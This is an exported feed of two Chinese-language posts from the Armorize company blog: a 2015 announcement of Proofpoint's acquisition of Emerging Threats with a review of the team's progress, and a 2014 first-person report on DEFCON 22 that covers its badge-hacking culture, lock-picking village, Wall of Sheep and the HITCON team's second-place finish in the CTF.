tag:blogger.com,1999:blog-14417594311407006762024-03-14T09:39:41.232+08:00阿碼外傳-阿碼科技非官方中文 Blog源碼檢測、靜態分析、白箱測試、黑箱測試、滲透測試、軟體安全、程式漏洞、資訊安全、Web安全、OWASP Top 10、SANS Top 20、資安趨勢、0-day、惡意程式、網站掛馬、駭客手法、攻擊手法、各地駭客年會、資安會議、駭客介紹、web application firewall (WAF)、應用程式防火牆、資安新聞、掛馬檢測、掛馬分析、黑客研究、大規模掛馬攻擊研究、路徑安全Unknownnoreply@blogger.comBlogger118125tag:blogger.com,1999:blog-1441759431140700676.post-30632834064233300492015-03-03T04:36:00.002+08:002015-03-17T14:35:51.382+08:00阿碼拜晚年:我們以12億現金併購 Emerging Threats,以及這一年半來的成績<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDrW41INqbXIgHS9HKHFEJaqAc7aWBF3IEUkQ_mAbR5bhAAKq2ArwMWiic5kRasBNwGYN0wzxIXfnDhpl3JPJ9tw3LWZeWpFvaHzFcnaWBCE5_cMMAy-p6PgwrJe2t5dpCsmjv1xwYMV4/s1600/2015-card-new+year.png" />
各位長期支持我們的朋友,先在這邊跟大家拜個晚年,祝大家羊年吉祥、羊眉吐氣,一帆風順羊關道,羊羊得意步步高!<br>
<br>
比較晚跟各位拜年,主要是希望同時跟各位宣布我們以約12億現金,併購開源 APT 特徵廠商 <a href="http://www.emergingthreats.net/">Emerging Threats</a> 的消息!時間過得很快,轉眼間我們也加入 <a href="https://www.proofpoint.com/">Proofpoint</a> 一年半了。創辦阿碼之初,我們夢想著:<br>
<ol type="1">
<li>於全球百大企業(Fortune 100)中拿到10家客戶。</li>
<li>在 Gartner 廠商評比中,取得龍頭地位。</li>
<li>成為全球最大的先進威脅掃描平台。</li>
<li>讓全球都有我們的客戶,體驗我們產品的好用。</li>
<li>去納斯達克敲鐘。</li>
</ol>
在成為 Proofpoint 的一年半內,我們與矽谷團隊一起達成了:
<ol type="1">
<li>併購了 4 家新創公司:<a href="http://www.sendmail.com/sm/open_source/community_letter/">SendMail</a>、<a href="http://armorize-cht.blogspot.tw/2014/05/proofpoint-apt-netcitadel.html">NetCitadel</a>、<a href="http://investors.proofpoint.com/releasedetail.cfm?ReleaseID=877941">Nexgate</a>、以及 <a href="http://www.emergingthreats.net/">Emerging Threats</a>。</li>
<li>於 Gartner 的 email 安全廠商評比報告中,評比第一。</li>
<li>每天掃描超過四億封 email。</li>
<li>每天用動態(沙箱)與靜態混和技術,分析超過120億網址,其中有70億不重複網址。</li>
<li>於全球百大企業(Fortune 100)中,擁有 45 家客戶。</li>
<li>保護全球上億使用者的 email。</li>
<li>推出了 Android 沙箱掃描平台。</li>
<li><a href="http://armorize-cht.blogspot.tw/2014/05/proofpoint-apt-netcitadel.html">去了納斯達克敲鐘</a>。</li>
</ol>
<br>
<img border="0" src="http://2.bp.blogspot.com/-YTCmNG09MnA/VPQy4CqCUfI/AAAAAAAABD4/B8a5YHtnOts/s1600/Proofpiont%2BEmerging%2BThreats%2Bblog.png" /><br>
<br>
科技正以前所未有的速度改變著人類行為,一方面帶來了新的行為模式、商業模式、與機會,一方面也促成了新的威脅面向與攻擊行為。<br>
<br>
為了提供使用者最完善的 APT 先進威脅防禦方案,除了不斷提升技術之外,併購優秀的新創團隊,也是我們持續努力的方向。在這一年半內,我們併購了 4 家新創:<br>
<span class="fullpost">
<br>
<ol type="1">
<li><a href="http://www.sendmail.com/sm/open_source/community_letter/">SendMail</a>(7億現金,外加股票)強化了我們對於巨量 email 流量的攔截能力>。</li>
<li><a href="http://armorize-cht.blogspot.tw/2014/05/proofpoint-apt-netcitadel.html">NetCitadel</a>(9億現金,外加股票)擁有端點(end-point)上獨特全自動 APT 事件處理機制,與阿碼動靜合一掃描平台搭配,可以將惡意程式的感染痕跡,當場做全自動的特徵取樣,並即使與網路上的防禦設備(如防火牆、IPS、UTM等)溝通,令所有相關設備立刻阻擋一切受感染機器之網路活動,防止資料外洩並阻斷後門連線。</li>
<li> <a href="http://investors.proofpoint.com/releasedetail.cfm?ReleaseID=877941">Nexgate</a>(10.5億現金,外加股票)讓我們可以將目前的 APT 掃描技術,延伸至社群網路平台上,包含臉書、推特、LinkedIn、Google+ 等,保護企業與品牌在社群網路上之安全。</li>
<li><a href="http://www.emergingthreats.net/">Emerging Threats</a> 擁有全球最豐富的 APT 威脅特徵以及連結入侵偵測系統如 <a href="https://www.snort.org/">Snort</a>、<a href="http://suricata-ids.org/">Suricata</a> 等平台的能力,讓我們對於 APT 的防護得以延伸至網路端。</li>
</ol>
回想 2007年我們從網站漏洞開始,到利用 Windows 沙箱偵測網站掛馬,到 2009 年惡意廣告檢測,到 2011年 email APT 檢測,到 2012 年動靜合一,到 2014 年 Android 沙箱與大數據分析,到至今我們系統能夠用動靜合一每天掃描超過120億網址,並橫跨 email、端點、社群網路,到 2015 年終於涵蓋網路節點、IDS、IPS。一路走來,若說我學會最重要的經驗,那就是:「團隊對了,一切就對了」。<br>
<br>
最近幾個月,由於客戶大增,團隊每天除了要忙於採購機器、上版新機,還要不斷導入新技術,克服巨量所帶來的種種問題,還要隨時追著最新攻擊手法,即時調整我們的偵測機制,種種一切,真的是把大家操翻了。<strong>阿碼能夠撐到今天,Proofpoint 能夠有今天的成績,完全靠這個團隊。雖然很辛苦,但加入 Proofpoint 一年半,還未有人離開,我們的離職率,是零。</strong><br>
<br>
大家常說,創業成功一半是運氣,我覺得的確,而我的好運氣,就是我碰到了這群太棒的戰友。<br>
<br>
公司剛成立的幾年,投資人常開玩笑說,他們得幫我保險,因為我是公司最重要的一個人,我掛了阿碼可能就差不多了。<br>
<br>
然而經過三年大家的努力,今天的阿碼,每個職務,每個部門都有同事獨立運作,部門之間鮮少衝突,我很少主持會議,更不需要求什麼。<br>
<br>
我的角色仍重要,但不是不可取代。這是阿碼很重要的成長。現在我的工作,就是每天讀大量的資料,研究趨勢,研究未來,然後只要能夠幫助提升團隊技術與能力的東西,舉凡情報、課程、活動、書籍、教材等,只要我看到了,就趕快讓團隊參與。軟體公司最大的資產就是人,<strong>一直不斷將資源投入人員的提升,是我認為軟體公司成功的不二法門。</strong><br>
<br>
很多人問我們,何時會再出來創業。<strong>我們目前沒有打算「出來」,因為我們感覺我們正在「創業」</strong>。我們正創造著全球最大的 email 威脅防禦平台,經歷著前所未有的巨量以及攻擊者針對性的挑戰,沒有太多前人經驗可以參考,但這正是令人興奮之處!<br>
<br>
創業家們總喜歡聊到「十億鎂企業」(billion dollar company),也就是市值超過十億美金的企業。去年初,我們終於被市場認定為「十億鎂企業」,而就在幾週前,我們的市值越過了二十億鎂的門檻。接下來,我們希望創造一家「十億鎂企業」,但不是「市值十億鎂」,而是一家「營收十億鎂」的企業,一家「持續性營收」(recurring revenue)達每年十億鎂的企業,一家擁有全球百大中7成以上客戶的企業,一家以人才為主,讓人才充分發揮創造力,永遠不斷創新的企業,<strong>一家核心掃瞄引擎是完全由台灣所研發與維運的企業!</strong><br>
<br>
希望在我五十歲之前能夠達成,之後我們就可以退休種田去了。<br>
<br>
除了研發與維運,在研究方面,我們去年抽空發表了幾篇威脅研究,各位可以參考 <a href="http://www.theverge.com/2014/10/7/6937055/inside-a-russian-malware-scheme-that-owned-500000-computers">The Verge</a>、<a href="http://www.crn.com/news/security/300074331/russian-cybercriminals-aim-at-u-s-bank-accounts-malware-infects-atms.htm">CRN</a>、<a href="http://www.zdnet.com/article/windows-xp-still-big-in-botnets-after-all-these-years/">ZD Net</a>、<a href="http://threatpost.com/malvertising-campaign-on-yahoo-aol-triggers-cryptowall-infections/108987">threat post</a>、<a href="http://www.theregister.co.uk/2014/10/23/cryptowall_malvertising_outbreak/">The Register</a>等媒體對我們的訪問報導。<br>
<br>
四月初在全球最大資安產業年會,矽谷的 RSA Conference 上,我將與前同事 Fyodor Yarochkin 、位於我們正樓下,南港育成中心三樓的比特幣新創 <a href="https://www.maicoin.com/">MaiCoin</a>、以及萊特幣創辦人 <a href="http://www.rsaconference.com/events/us15/speakers/charlie-lee">Charlie</a>,有一場關於<a href="http://www.rsaconference.com/events/us15/agenda/sessions/1710/bitcoins-future-threats-experts-roundtable-based-on">比特幣安全</a>方面的論壇,也歡迎各位多關心!<br>
<br>
再次感謝各位一路以來給我們的鼓勵,我們會繼續加油!<br>
<br>
黃耀文 Wayne<br>
<a href="https://www.armorize.com">阿碼科技</a>創辦人兼CEO<br>
<a href="https://www.proofpoint.com/">Proofpoint</a> 全球研發副總<br>
</span>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1441759431140700676.post-19047720076609455922014-08-11T08:42:00.001+08:002014-08-15T08:13:25.103+08:00一場全球駭客、自造者與技客的年度熱情交織,以及台灣之光 HITCON:DEFCON 2014 快訊<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSkK5djKMl3o0S17ESLjpt5wC0NJXma4viBc8lbzS9APEHb18tX7npIbpDEOcDggGcZl6z9BuVN_Ef96I-eO2EUubwkF_R52MxHmqGb3IwY1QIEV_hIeN0K6uIecE__7Axquq-K2LvN-s/s1600/IMG_2549-1.jpg" /><br>
<br>
入侵系統、寫病毒、破解家電、開鎖、社交工程、無線監聽、側錄技術、入侵交通控制系統、入侵飛航系統、自焊電路、機器人比賽、四軸飛行器、自制無線電、駭客擂台。<br>
<br>
駭客、資安專家、情治單位、自造者、技客、名校生、龐克頭、刺青、父母帶著小孩、白頭髮的老夫妻牽手參加。<br>
<br>
擺攤的廠商包含卡內基美隆大學(CMU)招生中心、駭客工具商、監聽設備商、開鎖工具商、技客用品商、以及電動車 Tesla。<br>
<br>
年輕女生專心地開著鎖,焊著電路板、全球最厲害的駭客隊伍埋頭打擂台、機器人愛好者比賽機器人射擊、名校教授發表演講、八歲小孩立志長大做個好駭客。<br>
<br>
講這麼多如何攻擊國家基礎架構如交通與飛航系統,教這麼多開鎖技巧,賣這麼多駭客工具與監聽設備...為何情治單位來了卻不抓人?為何卡內基美隆要來擺攤吸引學生?為何名校教授都要來此演講?為何父母親要帶著小孩來參加?為何會議有專給8-16歲小孩的議程?這究竟是個什麼樣的活動?<br>
<br>
唐 李益:豪不必馳千騎,雄不在垂雙鞬,天生俊氣自相逐,出與鵰鶚同飛翻。<br>
<br>
這是全球駭客、自造者與技客的年度熱情交織:DEFCON。<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4m9kax8EXKNNGlEdoptiWIkkPl6Qru78A4cUwwFWm_ommQ038l0AhGRmMDd287frphcouV6URDAdESB6FohgxKQEL6C1tz_jF9zWknG6dkuFHz9U3AGF6siSt1Qn1JB7TdqxItL79ah8/s1600/defcon+2014+b-1.jpg" /><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ick9JCFrK3rJUknfcA7mrMHoVnKjhBXm_VAkp1WX5hBrV5LOplOd7IjdXAv7t8SiCGPUVx3XTmwTy1XLDjSnu33RwUBt44s2zdsXv5hiXxDNBcVYjEUnKemrb42lEwIKebEvijn10AU/s1600/defcon+2014+glasses.jpg" /><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6sY-bfvgPCr4O9DmlpNBb_bigROQuGG_q6vZ593OUBAaHgNoTmCIMq9_cCTXijcBcHgBFvi28faQUnMwYDP0CBHpPXMds6VxiNoH6gNNkVzTt7bvxIayTawISDVJYr1hsrfxwWjHxD84/s1600/IMG_2740_742.jpg" /><br>
<br>
<span class="fullpost">
國一的某天放學回家,一開門看到家裡坐著兩個警察,心裡只想:「完了,來抓我了,我也不是真的要搞掛那個 BBS 的,我一定負責幫他修到好,我真的沒想到第一次寫病毒就 work...」。<br>
<br>
為了更深入研究,剪草送報,買了 Peter Norton 的 x86 組合語言書,但父親說聽朋友說,此書非我該看的...<br>
<br>
資工系畢業時,家裡一直鼓勵我唸管理相關,因為會有比 debuguy 更好的發展...<br>
<br>
成長的過程,一直不知該如何跟家人說:我想當一個駭客...<br>
<br>
如果你喜歡創新挑戰,喜歡自做東西,想解困難問題,學不會社會虛假,做不來政治操作,受不了傳統約束,咽不下黑心謊言,那在每年的 DEFCON 上,你會發現上萬個跟你一樣的技客,正用他們很真的心在跟你交流。<br>
<br>
看不懂的人會驚訝地問,駭客有真心?<br>
<br>
這樣說吧,駭客講話很真實,真實得容易得罪人,真實得足以驚動社會,真實得讓社會害怕。要小心的不是駭客的發表,而是政客講的話。<br>
<br>
駭客喜怒哀樂表現於外,你不用猜他們在想什麼,而你永遠搞不懂商人在做什麼。<br>
<br>
駭客不過是對任何事情想要追根、對任何謎題想要解碼、認為世界不該有太多秘密、覺得人不用活得這麼虛假的一群人。<br>
<br>
「正常人」覺得駭客很奇怪,但究竟誰才奇怪?<br>
<br>
第一天早上八點便到場排隊買票,排了三小時才拿到入場證。全球不知還有哪個上萬人的會議,是不能線上報名,不收信用卡,唯一入場方式就是現場排隊、現金買票的?<br>
<br>
大會的意思就是說,政府啊,不用費工夫來開搜索票根我們要參加者名單了,不是我們不配合,是整個大會沒人有參加者名單 :) Soli...<br>
<br>
唯一的缺點:一萬多人排隊付現,然後因為無法預估數量,每年入場證都做不夠... 排到一半,有人拿到入場證了,問他們何時開始排的?「喔,半夜十二點就來排啦!」。<br>
<br>
DEFCON 的入場證很特別,上面印著「不遵從」(DO NOT OBEY),三字點出駭客文化。它本身是一塊充滿玄機的電路板,可以讓參加者盡情的 hack:有 USB 可以接,有紅外線可以無線相互通訊,有付 SDK DVD 可以燒程式上去,有很多可以自行銲接或切割的點。會場「巷子內」有間工作室,擺了三條長桌,備了焊槍銲錫以及各式電容電阻與IC模組,可以讓技客們將自己的入場證大改特改。而很多改裝的方式,是需要注意細節去解碼的。例如吊帶上印的數字,例如電路板上的鍍金銲接點,有些圓的,有些方的,有用 CAD 軟體畫過電路的人一眼就會看出,這是故意的,一定是隱藏了某種密碼。<br>
<br>
大會的意思就是說,付錢排隊就可以拿到入場證,但不代表你就是駭客了。能夠 hack 你的入場證,才是證明你駭客技術的第一步。還有,光是會打鍵盤是不行滴,你手要巧、銲工要好,所以你還得有點自造者的血液才行。會場上甚至有人將此入場證改裝成四軸飛行器,了不起!<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibPjiNOaqg3hNamTb7-jsmkBZJHqtoUFYujBVFt11ji5gY7uJQtLahwp5gLyAWJhl7YaI5Z06MYXO8BSm469iZKkZwvgEc7XfalCqDQLjl3jIEdJWhl3jXMPYrgGdH6XOLwbnC5WZO5zI/s1600/defcon+2014+22+hardware.jpg" /><br>
(以上是阿碼 Matt 跟 Jordan,正在巷子內努力證明自己是駭客)<br>
<!-- <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt0V7Gcsvd_QmxXqnWIM8RHHO4nrzBDcQng2a2uvl_fDvvkkD-h8ELhCX3dxo6ZpKn5nSwoy16BQQcAgOXbIpVj7ZywZd3kryeEwOzU_AqSzHrZy8GqF4UU_iU1aisaOOycFAp89DMMZs/s1600/defcon+2014+a.jpg" /><br>-->
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2HGcQbNT11jwzM4TomvCDaxPXXEGZ6EE0ygeSQyEnPVrpeMxcDq2JXZhyphenhyphen1-CcLSd_EoFfarGB57olyM9Zj-ncKa_lbvkSQTZpGMQADLSJqzffl2j7dYmaPmS0EhLwFv8VkQWTYjXSyT8/s1600/defcon+2014+badges+new.jpg" /><br>
(上圖:把入場證改裝成四軸飛行器,以及利用逆向工程將電路圖畫出來,<a href="https://twitter.com/TheTarquin/status/498550019494924289/photo/1">這位朋友拍的</a>)<br>
<br>
關於這塊入場證的歷史,我特別去聽了 <a href="https://twitter.com/1o57">R.(Ryan) D. "1o57" "LostboY" Clarke(李智上)(圖左後)</a>與大會創辦人兼主席 <a href="https://twitter.com/thedarktangent">"The Dark Tangent" "DT" Jeff Moss</a> (圖右前)的演講。DEFCON 最不講地位,座位都是先到先贏,我幾乎最早來排了那麼久,怎地最好的四個位子竟然是保留席?<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKWs4-4qjp6iyYb0Ch1FqGbM6PpsXaF8-1K9KuTaB8Ey-6wmVUL2psOII5CR-NwzbvGYI04ML4XVGD31OveUB3mZAx4ErLni2RRepRTBd_JA4Zg0CEkVplOWYdtRHLHp91Fbbho5EYQFM/s1600/defcon+2014+e.jpg" /><br>
<br>
原來,這是留給 Clarke 的雙親以及太太的。「我從沒想到,我做的這種宅玩意,竟然會有那麼多人喜歡、支持,謝謝你們...」年紀一把的 Clarke 在台上哽咽流淚。為了讓這吊牌傳統能夠永遠延續下去,今年 Clarke 說服了主要晶片廠 Parallax,將整塊板子含晶片都<a href="http://www.parallax.com/microcontrollers/propeller-1-open-source">開放源碼</a>出來;人會老死,但社群將永續下去,聽到這,我們不禁想:今年是 DEFCON 22,不知 DEFCON 100 時會是什麼一個情況?<br>
<br>
很多技客來 DEFCON 是不聽演講,專跑村(Village)的。DEFCON 有硬體村、無線村、社交工程村,但最受歡迎的,可能是開鎖村。介紹這個村,我想引用我六年前參加 DEFCON 後<a href="http://armorize-cht.blogspot.tw/2008/08/defcon-2008.html">寫的筆記</a>:<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ4zknICV6fU14VBsAkSU7pUKCvQKO_in_JS0yYAUFCvCiEYnGc7tR5JkoTjptWSnzK7pfXwRRxyKo2902TeOShawIj9IrmA7xNxLb_4nPYIRAJ034305t5afL8EyYM6CVcn74m3sOXYs/s1600/defcon+2014+d.jpg" /><br>
<br>
------------------------<br>
進去後先吃早餐,排隊排到都餓了。我坐下來,發現旁邊是一位很年輕的美國人,看來很想睡覺,眼睛幾乎睜不開了,但是手卻很忙,仔細一看,他正在開鎖,工具就擺在桌上。邊吃邊聊了起來,原來他就是 Jon King,正在開美國能做出來最安全的鎖:<a href="http://www.medeco.com">Medeco </a>的最頂級六針型鎖頭。<a href="http://www.medeco.com">Medeco </a>目前有超過四百名員工,在美國高階鎖市場市佔率達七成以上,凡舉各銀行,機密單位,軍方等,一律都採用<a href="http://www.medeco.com">Medeco </a>的鎖,所以一般美國鎖匠,也把 <a href="http://www.medeco.com">Medeco </a>看成是「終極神鎖」。
<br />
<br />Jon 說他兩天沒睡了,眼睛睜不開,但是還是很熱心的一直跟我說,他是如何破解這顆鎖的。雖然我不懂鎖,但是聽起來真是有趣...<br>
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfHHcETYcgRAQKQqEwbovf15ACZPc9F2l4OEb2toY-apJPMx48Tyc2syLUaqA6_S65p1IF0LVOmPz8RIq9KUcN5RSY9Vj_F7nI47oe1_etsIlLUtwOqzWcV4K5VFK0D3PT0WY_arnoOSs/s1600-h/IMG_2633_filtered_WBed_cropped_730.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfHHcETYcgRAQKQqEwbovf15ACZPc9F2l4OEb2toY-apJPMx48Tyc2syLUaqA6_S65p1IF0LVOmPz8RIq9KUcN5RSY9Vj_F7nI47oe1_etsIlLUtwOqzWcV4K5VFK0D3PT0WY_arnoOSs/s1600/IMG_2633_filtered_WBed_cropped_730.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5237069647387088642" /></a>
------------------------<br>
<br>
開鎖村會在 DEFCON 大受歡迎,其實一點不奇怪。開鎖、找漏洞、逆向工程,在精神上都是把一套安全機制當作一個謎題來解,一方面挑戰自己的技術,一方面也挑戰廠商的安全宣言。而不論是在資訊領域或在實體鎖的領域,似乎每年上演著同樣的戲碼:廠商宣稱,我們的設計多麼安全又多麼安全,保證再保證,而駭客不相信,破解了之後,遵循負責任弱點揭露程序(<a href="http://en.wikipedia.org/wiki/Responsible_disclosure">responsible disclosure</a>) 程序一再通知廠商,廠商不理,最後駭客投稿 DEFCON 要將事情公開,可是在前一天因受不了廠商透過各種管道施加的壓力而取消演講...<br>
<br>
來到 DEFCON,一定得去綿羊牆看看。綿羊牆(wall of sheep)一直是 DEFCON 有趣的特色之一,用意是要提升資安基本常識。任何未經加密的上網行為(如 HTTP)都可以輕易地被側錄。綿羊牆團隊全天候監控大會的網路封包,抓到與會者的機密資料,如帳號密碼或信用卡號碼等,就貼到綿羊牆上去恭喜他 :) <br>
<br>
綿羊牆團隊不使用任何解密工具,所以牆上的綿羊都是自己使用了明碼的通訊(沒有加密的 FTP、POP、SMTP...)而光榮上榜的。<br>
<br>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sQWmF6YLzM6Ydh2lC4KQGCkKgi7DQ3BRZ9W9HT7W3EHr5LbE_rpGuj6h26iqhmMWAzLEaTu1N_nLrE3aTwf7qSavD-O5J4Aesb_Z-fy9P5pktJ-Tnqm557kpWvdBfgstyr18Oelv1gg/s1600/IMG_2510_742.jpg" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sQWmF6YLzM6Ydh2lC4KQGCkKgi7DQ3BRZ9W9HT7W3EHr5LbE_rpGuj6h26iqhmMWAzLEaTu1N_nLrE3aTwf7qSavD-O5J4Aesb_Z-fy9P5pktJ-Tnqm557kpWvdBfgstyr18Oelv1gg/s1600/IMG_2510_742.jpg" /></a><br>
<br>
至於其他資訊與電機方面的演講,真是多到沒辦法一下子描述清楚了。除了各種網路上的攻擊與滲透技術外,被擠爆的還有 Xaphan 等人講的駭客幣 DEFCOIN、因慶祝DEFCON 今年第 22 屆而在45分鐘內講完如何打爆22種家電(電視、網路攝影機、藍光機等,包含三星、LG、Sony、Panasonic、Google、亞馬遜、華碩皆中鎗)的 GTVHACKER 團隊、遠距可讓保險絲燒斷的 Jauregui 情侶檔、利用四軸飛行器辨識並追蹤路人的 Wilkinson、以及駭入交通訊號系統的 Currudo 等。<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hzQKPfkjzSRSD3wD9lPls9550leU4tatCKrDF5Gbo41VFSh8UqlxV2R62orjwd8qudklW52JRcUI2gxzLSMOogAuKyKRrohyjABWhADmAtorECa1KEfzOuPg76yu0xXnEVymFTAFnLA/s1600/defcon+2014+f.jpg" /><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdyopsteF-o9Dyy_klrf1pivFBG9mLKuQgUyr3A5lM61WJr8zzjL78y39pqdqIA-TrrW7L9zEVu9onqbkl1qpHJekkwN4A1l4dgAM4TmAOenmcB2Ih8-sgLBibhyF38_RC_3noeeSyP1M/s1600/defcon+2014+22+pwn.jpg" /><br>
<br>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNsoRUMw5ZPbnhEirbkmUgltoEv8QLwOCklnjV31e6Tg_uj7uaJruP625Egm9eSbA32zSTASC0yw3wA1MmdhhhexvCM7VatfwmSB8ZPDtmCjqf8DFngYMlLs-8dAALy0mPt1NbQ3ywHCQ/s1600/IMG_3048.jpg" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNsoRUMw5ZPbnhEirbkmUgltoEv8QLwOCklnjV31e6Tg_uj7uaJruP625Egm9eSbA32zSTASC0yw3wA1MmdhhhexvCM7VatfwmSB8ZPDtmCjqf8DFngYMlLs-8dAALy0mPt1NbQ3ywHCQ/s1600/IMG_3048.jpg" /></a><br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEita3hWtZJ-U6Za3HDlO_tCTgSOAX-4GX3tYCEj1525YuFxmRSLhJMm98_hFa6ciNNIvo1HsitgxHXxIvAzA4BUOK5dK1KUqya82Ehhwl0EYhYSao9dYj-BNM8kTAo-QvUZ9j3xjIcunFA/s1600/IMG_2586_742.jpg" /><br>
<br>
不過最讓大家興奮的,是我們台灣駭客年會 <a href="http://hitcon.org/">HITCON</a> 的戰隊,今年<a href="http://www.ithome.com.tw/news/88072">整合了來自 CHROOT、臺大217、交大資工等選手</a>,讓台灣終於擊敗了來自全球九百多隻隊伍,第一次打進了 DEFCON 網路安全技術技術對抗賽(CTF) 的決賽,與來自全球的前 20 強隊,進行網路攻防擂台賽!<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSkK5djKMl3o0S17ESLjpt5wC0NJXma4viBc8lbzS9APEHb18tX7npIbpDEOcDggGcZl6z9BuVN_Ef96I-eO2EUubwkF_R52MxHmqGb3IwY1QIEV_hIeN0K6uIecE__7Axquq-K2LvN-s/s1600/IMG_2549-1.jpg" />
<br>
台灣這次能夠打進去,得來不易,領隊李倫銓從2005年開始參加 DEFCON,一直希望台灣能夠有隊伍參加決賽,但這夢想,一直努力到今年,才終於得以實現。<br>
<br>
昨天 HITCON 分數曾高居第一,但多年來的冠軍,美國隊 PPP 卻一直是隱憂。PPP 視今年第一年打進決賽的 HITCON 為勁敵,所以第一天全程幾乎不太對 HITCON 攻擊,目的就是不讓 HITCON 了解其攻擊手法。剛才大會公佈,PPP 冠軍,HITCON 亞軍!!各位,台灣第一次進入決賽,就拿了第二名,而韓國由政府強力從學校就開始扶植的五個團隊,都沒能贏過我們!<br>
<br>
在這邊恭喜領隊<a href="https://www.facebook.com/alan2nala">李倫銓</a>、隊長<a href="https://www.facebook.com/Orange.8361">Orange</a>、以及全體隊員!我覺得除了贏得比賽,為國爭光外,大家一起努力的過程,是一輩子美好的回憶。<br>
<br>
最後,我想說,DEFCON 今年第 22 年了,每年在拉斯維加斯這麼多場的駭客技術教學、破解技術教學、與開鎖手法教學,為何從來沒出過事情?為何這裡的旅館總是那麼歡迎 DEFCON 的與會者?為何沒有一晚後很多旅館的鎖頭都壞了,系統都掛了?<br>
<br>
因為 hacking 是一種思維,一種生活方式,而身為 hacker 是一種驕傲,真正的駭客是不可能去搞破壞的。唯一每年不斷上演的戲碼,就是廠商為了不讓產品的弱點被空開,不顧使用者的權利,而用盡手段阻止講者上台,今年也不例外。這些弱點若不被公佈,廠商永遠不能承認自身的漏洞,也永遠不可能投資在加強資安上面,那麼最後倒霉的,就使用者了。<br>
<br>
其實,DEFCON 每年都會主動邀請三軍、情治與檢調單位與會,來自這些單位的府方,每年組成一個論壇「Meet the Feds」,一方面與社群建立良好關係,一方面也百般廣告設法招募人才。如果有創投有本事把 DEFCON 會場所有技客網羅下來的話,應該可以開好幾家 Google 跟 蘋果吧!但是去年史諾登事件,徹底傷了駭客的心,原來國安局這麼多年來對百姓進行監控。必要的監控也許無法避免,但是要建立在信任而不是在欺瞞的基礎上。<br>
<br>
所以去年雙方關係到達冰點,DEFCON 第一次不主動邀請府方參加。今年算是解凍了,府方都有來,只是沒有上台;相信這裂痕會漸漸修補起來。看著來自全球帶著自己的小孩來參加的父母,看著今年特別推出給 8 至 16 歲小朋友(需父母陪同)的議程,看著白頭髮的夫妻牽著手排隊,我們都知道 DEFCON 會辦到 100 屆,而到時候,因為我們都已經不在了,就麻煩各位朋友繼續參加 CTF 為台灣爭光,也為每年精彩的 DEFCON,留一下記錄了!<br>
<br>
最後,附上我旅行至拉斯維加斯的心得隨筆:<br>
-----------------------------------<br>
為了參加美國駭客年會,我們又來到了拉斯維加斯。賭博、酒吧、脫衣舞孃,還有那千奇百怪的人造景觀...學佛吃素的我,在這從景物到人情,全是假出來的城市中、在這下飛機還沒領到行李就先遇到拉霸檯的城市中,該如何自處?約了之前報導我們的 USA Today 記者吃飯,我們有個共同點:我們對公司與品牌的故事極有興趣。拉斯維加斯能給我們深度嗎?我挑了知名的 Le Cirque 餐廳,並驚訝地發現,每個城市的角落,都有它的深度。進到餐廳後,第一個注意到的,是服務人員年紀都非常大,很統一都四十五以上到六十。<br>
<br>
開始點餐,我不吃甜與澱粉類,結果幫我點餐的老先生也一樣,於是開始聊起來。「您在這多久了?」「喔,從開張就在這了」「天哪!」「事實上,我們這邊所有的工作人員,沒人離開過,您看到的很多人,都是開張就在了」「沒有一個員工離開過?」「對,18年了,沒有一個員工離開過,您看到的,是原創業團隊喔!」。<br>
<br>
整個用餐的過程完美過頭得詭異。服務人員穿插著為我們提供各種服務,默契無間,就像是從小一起打球到大的老朋友們,過程中妙傳連連,令人眼花繚亂卻又心曠神怡。Matt 說他們一定是均分小費,因為大家是各司其職、齊顧全場,並沒有分哪桌是誰的。最特別的,工作人員自然流露的好心情以及彼此間的相惜情感,快速感染了所有的顧客,讓整晚就是一個非常歡樂溫馨的氣氛...而這種氣氛,在拉斯維加斯城中,卻諷刺地難得。<br>
<br>
路經許多知名景點,常感受到那表面五光十色、繽紛熱鬧,大聲歡笑、扭動身軀的背後,人們心裡的孤獨與惆悵、自我麻醉的無奈、以及激情後的空虛。「先生,請問您們今晚開心嗎?」服務員親切地問,打斷了我的思緒。「非常好!你們真的一個都沒有離開過?」「當然。我們愛這裡,很高興您也喜歡這裡,希望您們以後再來!」美國西南航空創辦人 赫伯‧凱勒 (Herb Kelleher) 曾說:「先有快樂的員工,才有滿意的客戶,然後才有滿意的投資人--順序別搞錯了」。今晚,Le Cirque 讓我對這句話有了更深的體會。<br>
<br>
